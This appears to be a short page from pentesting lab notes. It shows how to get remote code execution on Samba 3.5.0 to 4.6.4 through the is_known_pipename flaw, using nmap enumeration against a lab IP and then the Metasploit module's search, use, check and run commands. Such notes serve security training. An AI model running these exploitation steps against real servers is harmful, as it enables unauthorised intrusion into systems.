Samba smbd 3.X - 4.X (Samba 3.5.0 -RCE)

Samba is the Linux implementation of SMB.

Samaba v.3.5.0 is vulnerable to a RCE vulnerability

#Enumeration

db_nmap -sS -sV -O 192.234.251.3

#Exploitation

search type:exploit name:samba
use exploit/linux/samba/is_known_pipename
info
# Description:
#   This module triggers an arbitrary shared library load vulnerability 
#   in Samba versions 3.5.0 to 4.4.14, 4.5.10, and 4.6.4. This module 
#   requires valid credentials, a writeable folder in an accessible 
#   share, and knowledge of the server-side path of the writeable 
#   folder. In some cases, anonymous access combined with common 
#   filesystem locations can be used to automatically exploit this 
#   vulnerability.
options
check
run

PreviousBrute Force NextSMTP

Last updated 1 year ago

hashtag#Enumeration

hashtag#Exploitation

#Enumeration

#Exploitation